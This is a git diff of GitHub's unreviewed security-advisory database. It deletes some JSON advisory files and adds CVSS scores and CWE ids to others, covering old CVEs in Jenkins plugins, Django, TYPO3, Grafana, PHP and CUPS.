- "modified": "2022-05-01T02:04:33Z", + "modified": "2024-02-08T21:30:31Z", "published": "2022-05-01T02:04:33Z", "aliases": [ "CVE-2005-2059" ], "details": "Multiple cross-site request forgery (CSRF) vulnerabilities in (1) addaddress.php, (2) toggleignore.php, (3) removeignore.php, and (4) removeaddress.php in Infopop UBB.Threads before 6.5.2 Beta allow remote attackers to modify settings as another user via a link or IMG tag.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-352" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-9r7f-rqhw-j8h8/GHSA-9r7f-rqhw-j8h8.json b/advisories/unreviewed/2022/05/GHSA-9r7f-rqhw-j8h8/GHSA-9r7f-rqhw-j8h8.json deleted file mode 100644 index 84d0ffb949ba7..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-9r7f-rqhw-j8h8/GHSA-9r7f-rqhw-j8h8.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-9r7f-rqhw-j8h8", - "modified": "2022-05-13T01:18:43Z", - "published": "2022-05-13T01:18:43Z", - "aliases": [ - "CVE-2018-1000015" - ], - "details": "On Jenkins instances with Authorize Project plugin, the authentication associated with a build may lack the Computer/Build permission on some agents. This did not prevent the execution of Pipeline `node` blocks on those agents due to incorrect permissions checks in Pipeline: Nodes and Processes plugin 2.17 and earlier.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000015" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-01-22/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-01-23T14:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-9rx5-w522-5fh7/GHSA-9rx5-w522-5fh7.json b/advisories/unreviewed/2022/05/GHSA-9rx5-w522-5fh7/GHSA-9rx5-w522-5fh7.json deleted file mode 100644 index 951c7b3381d2b..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-9rx5-w522-5fh7/GHSA-9rx5-w522-5fh7.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-9rx5-w522-5fh7", - "modified": "2022-05-13T01:48:32Z", - "published": "2022-05-13T01:48:32Z", - "aliases": [ - "CVE-2018-1000114" - ], - "details": "An improper authorization vulnerability exists in Jenkins Promoted Builds Plugin 2.31.1 and earlier in Status.java and ManualCondition.java that allow an attacker with read access to jobs to perform promotions.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000114" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-02-26/#SECURITY-746" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-863" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-03-13T13:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-9xg7-gg9m-rmq9/GHSA-9xg7-gg9m-rmq9.json b/advisories/unreviewed/2022/05/GHSA-9xg7-gg9m-rmq9/GHSA-9xg7-gg9m-rmq9.json deleted file mode 100644 index 72005dc58e5a7..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-9xg7-gg9m-rmq9/GHSA-9xg7-gg9m-rmq9.json +++ /dev/null @@ -1,67 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-9xg7-gg9m-rmq9", - "modified": "2022-05-02T03:37:17Z", - "published": "2022-05-02T03:37:17Z", - "aliases": [ - "CVE-2009-2659" - ], - "details": "The Admin media handler in core/servers/basehttp.py in Django 1.0 and 0.96 does not properly map URL requests to expected \"static media files,\" which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a crafted URL.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-2659" - }, - { - "type": "WEB", - "url": "https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00055.html" - }, - { - "type": "WEB", - "url": "https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00069.html" - }, - { - "type": "WEB", - "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=539134" - }, - { - "type": "WEB", - "url": "http://code.djangoproject.com/changeset/11353" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/36137" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/36153" - }, - { - "type": "WEB", - "url": "http://www.djangoproject.com/weblog/2009/jul/28/security/" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2009/07/29/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/35859" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-22" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2009-08-04T16:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-c3r5-vxj6-62mc/GHSA-c3r5-vxj6-62mc.json b/advisories/unreviewed/2022/05/GHSA-c3r5-vxj6-62mc/GHSA-c3r5-vxj6-62mc.json deleted file mode 100644 index cb834f42ee801..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-c3r5-vxj6-62mc/GHSA-c3r5-vxj6-62mc.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-c3r5-vxj6-62mc", - "modified": "2023-10-25T18:31:24Z", - "published": "2022-05-24T16:52:46Z", - "aliases": [ - "CVE-2019-10379" - ], - "details": "Jenkins Google Cloud Messaging Notification Plugin 1.0 and earlier stores credentials unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10379" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-591" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-522" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-08-07T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-c3wf-rrhq-rfp2/GHSA-c3wf-rrhq-rfp2.json b/advisories/unreviewed/2022/05/GHSA-c3wf-rrhq-rfp2/GHSA-c3wf-rrhq-rfp2.json deleted file mode 100644 index b11161ece43e7..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-c3wf-rrhq-rfp2/GHSA-c3wf-rrhq-rfp2.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-c3wf-rrhq-rfp2", - "modified": "2023-10-25T18:31:31Z", - "published": "2022-05-24T17:03:47Z", - "aliases": [ - "CVE-2019-16560" - ], - "details": "A cross-site request forgery vulnerability in Jenkins WebSphere Deployer Plugin 1.6.1 and earlier allows attackers to perform connection tests and determine whether files with an attacker-specified path exist on the Jenkins master file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16560" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1371" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/12/17/1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-12-17T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-c6mp-g88m-3h4r/GHSA-c6mp-g88m-3h4r.json b/advisories/unreviewed/2022/05/GHSA-c6mp-g88m-3h4r/GHSA-c6mp-g88m-3h4r.json index 21df7281ada2a..096912d6e0a2b 100644 --- a/advisories/unreviewed/2022/05/GHSA-c6mp-g88m-3h4r/GHSA-c6mp-g88m-3h4r.json +++ b/advisories/unreviewed/2022/05/GHSA-c6mp-g88m-3h4r/GHSA-c6mp-g88m-3h4r.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-c6mp-g88m-3h4r", - "modified": "2022-05-02T03:45:31Z", + "modified": "2024-02-08T15:30:26Z", "published": "2022-05-02T03:45:31Z", "aliases": [ "CVE-2009-3482" ], "details": "TrustPort Antivirus before 2.8.0.2266 and PC Security before 2.0.0.1291 use weak permissions (Everyone: Full Control) for files under %PROGRAMFILES%, which allows local users to gain privileges by replacing executables with Trojan horse programs.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-732" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-c73w-4rcj-2622/GHSA-c73w-4rcj-2622.json b/advisories/unreviewed/2022/05/GHSA-c73w-4rcj-2622/GHSA-c73w-4rcj-2622.json deleted file mode 100644 index d2d9c602d621d..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-c73w-4rcj-2622/GHSA-c73w-4rcj-2622.json +++ /dev/null @@ -1,59 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-c73w-4rcj-2622", - "modified": "2022-05-02T03:47:10Z", - "published": "2022-05-02T03:47:10Z", - "aliases": [ - "CVE-2009-3636" - ], - "details": "Cross-site scripting (XSS) vulnerability in the Install Tool subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3636" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53929" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=125633199111438&w=2" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/37122" - }, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/36801" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2009/3009" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2009-11-02T15:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-c8qr-vfjf-62q3/GHSA-c8qr-vfjf-62q3.json b/advisories/unreviewed/2022/05/GHSA-c8qr-vfjf-62q3/GHSA-c8qr-vfjf-62q3.json deleted file mode 100644 index 743272c776015..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-c8qr-vfjf-62q3/GHSA-c8qr-vfjf-62q3.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-c8qr-vfjf-62q3", - "modified": "2022-05-13T01:36:51Z", - "published": "2022-05-13T01:36:51Z", - "aliases": [ - "CVE-2017-2654" - ], - "details": "jenkins-email-ext before version 2.57.1 is vulnerable to an Information Exposure. The Email Extension Plugins is able to send emails to a dynamically created list of users based on the changelogs, like authors of SCM changes since the last successful build. This could in some cases result in emails being sent to people who have no user account in Jenkins, and in rare cases even people who were not involved in whatever project was being built, due to some mapping based on the local-part of email addresses.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2654" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2654" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-03-20/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-08-06T22:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-c9px-7j36-f35v/GHSA-c9px-7j36-f35v.json b/advisories/unreviewed/2022/05/GHSA-c9px-7j36-f35v/GHSA-c9px-7j36-f35v.json deleted file mode 100644 index d0a3188bde5be..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-c9px-7j36-f35v/GHSA-c9px-7j36-f35v.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-c9px-7j36-f35v", - "modified": "2022-05-13T01:48:34Z", - "published": "2022-05-13T01:48:34Z", - "aliases": [ - "CVE-2018-1000189" - ], - "details": "A command execution vulnerability exists in Jenkins Absint Astree Plugin 1.0.5 and older in AstreeBuilder.java that allows attackers with Overall/Read access to execute a command on the Jenkins master.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000189" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-06-04/#SECURITY-807" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-06-05T20:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-ccmg-w4xm-p28v/GHSA-ccmg-w4xm-p28v.json b/advisories/unreviewed/2022/05/GHSA-ccmg-w4xm-p28v/GHSA-ccmg-w4xm-p28v.json deleted file mode 100644 index 56453021c86bb..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-ccmg-w4xm-p28v/GHSA-ccmg-w4xm-p28v.json +++ /dev/null @@ -1,63 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-ccmg-w4xm-p28v", - "modified": "2022-05-24T17:16:26Z", - "published": "2022-05-24T17:16:26Z", - "aliases": [ - "CVE-2020-12245" - ], - "details": "Grafana before 6.7.3 allows table-panel XSS via column.title or cellLinkTooltip.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12245" - }, - { - "type": "WEB", - "url": "https://github.com/grafana/grafana/pull/23816" - }, - { - "type": "WEB", - "url": "https://community.grafana.com/t/release-notes-v6-7-x/27119" - }, - { - "type": "WEB", - "url": "https://github.com/grafana/grafana/blob/master/CHANGELOG.md#673-2020-04-23" - }, - { - "type": "WEB", - "url": "https://security.netapp.com/advisory/ntap-20200511-0001/" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00060.html" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00083.html" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00009.html" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00017.html" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-04-24T21:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-cgr9-h9qq-x9fx/GHSA-cgr9-h9qq-x9fx.json b/advisories/unreviewed/2022/05/GHSA-cgr9-h9qq-x9fx/GHSA-cgr9-h9qq-x9fx.json deleted file mode 100644 index 21c88eaee05d0..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-cgr9-h9qq-x9fx/GHSA-cgr9-h9qq-x9fx.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-cgr9-h9qq-x9fx", - "modified": "2022-05-02T06:18:15Z", - "published": "2022-05-02T06:18:14Z", - "aliases": [ - "CVE-2010-1022" - ], - "details": "The TYPO3 Security - Salted user password hashes (t3sec_saltedpw) extension before 0.2.13 for TYPO3 allows remote attackers to bypass authentication via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-1022" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/38992" - }, - { - "type": "WEB", - "url": "http://typo3.org/extensions/repository/view/t3sec_saltedpw/0.2.13/" - }, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/38799" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-287" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-03-19T19:00:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-cq9m-rpm5-27m9/GHSA-cq9m-rpm5-27m9.json b/advisories/unreviewed/2022/05/GHSA-cq9m-rpm5-27m9/GHSA-cq9m-rpm5-27m9.json deleted file mode 100644 index 2c6618307aebd..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-cq9m-rpm5-27m9/GHSA-cq9m-rpm5-27m9.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-cq9m-rpm5-27m9", - "modified": "2022-05-13T01:17:42Z", - "published": "2022-05-13T01:17:42Z", - "aliases": [ - "CVE-2019-1003095" - ], - "details": "Jenkins Perfecto Mobile Plugin stores credentials unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003095" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1061" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-311" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-cqp7-hwm3-cfg7/GHSA-cqp7-hwm3-cfg7.json b/advisories/unreviewed/2022/05/GHSA-cqp7-hwm3-cfg7/GHSA-cqp7-hwm3-cfg7.json deleted file mode 100644 index 195663cf842cb..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-cqp7-hwm3-cfg7/GHSA-cqp7-hwm3-cfg7.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-cqp7-hwm3-cfg7", - "modified": "2022-05-13T01:31:34Z", - "published": "2022-05-13T01:31:34Z", - "aliases": [ - "CVE-2019-1003023" - ], - "details": "A cross-site scripting vulnerability exists in Jenkins Warnings Next Generation Plugin 1.0.1 and earlier in src/main/java/io/jenkins/plugins/analysis/core/model/DetailsTableModel.java, src/main/java/io/jenkins/plugins/analysis/core/model/SourceDetail.java, src/main/java/io/jenkins/plugins/analysis/core/model/SourcePrinter.java, src/main/java/io/jenkins/plugins/analysis/core/util/Sanitizer.java, src/main/java/io/jenkins/plugins/analysis/warnings/DuplicateCodeScanner.java that allows attackers with the ability to control warnings parser input to have Jenkins render arbitrary HTML.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003023" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-1271" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-02-06T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-crvq-mw2w-4cfx/GHSA-crvq-mw2w-4cfx.json b/advisories/unreviewed/2022/05/GHSA-crvq-mw2w-4cfx/GHSA-crvq-mw2w-4cfx.json deleted file mode 100644 index 5ff69b12056e1..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-crvq-mw2w-4cfx/GHSA-crvq-mw2w-4cfx.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-crvq-mw2w-4cfx", - "modified": "2022-05-13T01:48:34Z", - "published": "2022-05-13T01:48:34Z", - "aliases": [ - "CVE-2018-1000197" - ], - "details": "An improper authorization vulnerability exists in Jenkins Black Duck Hub Plugin 3.0.3 and older in PostBuildScanDescriptor.java that allows users with Overall/Read permission to read and write the Black Duck Hub plugin configuration.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000197" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-05-09/#SECURITY-670" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-863" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-06-05T21:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-cv8q-mpvf-42h2/GHSA-cv8q-mpvf-42h2.json b/advisories/unreviewed/2022/05/GHSA-cv8q-mpvf-42h2/GHSA-cv8q-mpvf-42h2.json index ded5ef9bda896..5bf89f3e13796 100644 --- a/advisories/unreviewed/2022/05/GHSA-cv8q-mpvf-42h2/GHSA-cv8q-mpvf-42h2.json +++ b/advisories/unreviewed/2022/05/GHSA-cv8q-mpvf-42h2/GHSA-cv8q-mpvf-42h2.json @@ -40,6 +40,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-362", "CWE-416", "CWE-787" ], diff --git a/advisories/unreviewed/2022/05/GHSA-cvh8-9j4x-5v4j/GHSA-cvh8-9j4x-5v4j.json b/advisories/unreviewed/2022/05/GHSA-cvh8-9j4x-5v4j/GHSA-cvh8-9j4x-5v4j.json deleted file mode 100644 index f078c7cd8c223..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-cvh8-9j4x-5v4j/GHSA-cvh8-9j4x-5v4j.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-cvh8-9j4x-5v4j", - "modified": "2022-05-13T01:18:46Z", - "published": "2022-05-13T01:18:46Z", - "aliases": [ - "CVE-2018-1000424" - ], - "details": "An insufficiently protected credentials vulnerability exists in Jenkins Artifactory Plugin 2.16.1 and earlier in ArtifactoryBuilder.java, CredentialsConfig.java that allows attackers with local file system access to obtain old credentials configured for the plugin before it integrated with Credentials Plugin.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000424" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-09-25/#SECURITY-265" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/106532" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-522" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-01-09T23:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-cwwq-64rr-rv47/GHSA-cwwq-64rr-rv47.json b/advisories/unreviewed/2022/05/GHSA-cwwq-64rr-rv47/GHSA-cwwq-64rr-rv47.json index 81aa390b4bd68..5f61faca7a51e 100644 --- a/advisories/unreviewed/2022/05/GHSA-cwwq-64rr-rv47/GHSA-cwwq-64rr-rv47.json +++ b/advisories/unreviewed/2022/05/GHSA-cwwq-64rr-rv47/GHSA-cwwq-64rr-rv47.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-cwwq-64rr-rv47", - "modified": "2022-05-17T05:47:59Z", + "modified": "2024-02-08T21:30:32Z", "published": "2022-05-17T05:47:59Z", "aliases": [ "CVE-2010-1866" ], "details": "The dechunk filter in PHP 5.3 through 5.3.2, when decoding an HTTP chunked encoding stream, allows context-dependent attackers to cause a denial of service (crash) and possibly trigger memory corruption via a negative chunk size, which bypasses a signed comparison, related to an integer overflow in the chunk size decoder.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-190" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-cwxx-gwwj-pqjq/GHSA-cwxx-gwwj-pqjq.json b/advisories/unreviewed/2022/05/GHSA-cwxx-gwwj-pqjq/GHSA-cwxx-gwwj-pqjq.json deleted file mode 100644 index 47610f5fe04f1..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-cwxx-gwwj-pqjq/GHSA-cwxx-gwwj-pqjq.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-cwxx-gwwj-pqjq", - "modified": "2022-05-13T01:48:33Z", - "published": "2022-05-13T01:48:33Z", - "aliases": [ - "CVE-2018-1000145" - ], - "details": "An exposure of sensitive information vulnerability exists in Jenkins Perforce Plugin version 1.3.36 and older in PerforcePasswordEncryptor.java that allows attackers with local file system access to obtain encrypted Perforce passwords and decrypt them.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000145" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-03-26/#SECURITY-373" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-04-05T13:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-f4w3-fh2q-326p/GHSA-f4w3-fh2q-326p.json b/advisories/unreviewed/2022/05/GHSA-f4w3-fh2q-326p/GHSA-f4w3-fh2q-326p.json index fe156007624e4..52fc512175494 100644 --- a/advisories/unreviewed/2022/05/GHSA-f4w3-fh2q-326p/GHSA-f4w3-fh2q-326p.json +++ b/advisories/unreviewed/2022/05/GHSA-f4w3-fh2q-326p/GHSA-f4w3-fh2q-326p.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-f4w3-fh2q-326p", - "modified": "2022-05-02T06:11:28Z", + "modified": "2024-02-03T03:30:26Z", "published": "2022-05-02T06:11:28Z", "aliases": [ "CVE-2010-0302" ], "details": "Use-after-free vulnerability in the abstract file-descriptor handling interface in the cupsdDoSelect function in scheduler/select.c in the scheduler in cupsd in CUPS before 1.4.4, when kqueue or epoll is used, allows remote attackers to cause a denial of service (daemon crash or hang) via a client disconnection during listing of a large number of print jobs, related to improperly maintaining a reference count. NOTE: some of these details are obtained from third party information. NOTE: this vulnerability exists because of an incomplete fix for CVE-2009-3553.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -93,7 +96,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-f68m-q26r-64f6/GHSA-f68m-q26r-64f6.json b/advisories/unreviewed/2022/05/GHSA-f68m-q26r-64f6/GHSA-f68m-q26r-64f6.json deleted file mode 100644 index a39664b5a0a5e..0000000000000 --- 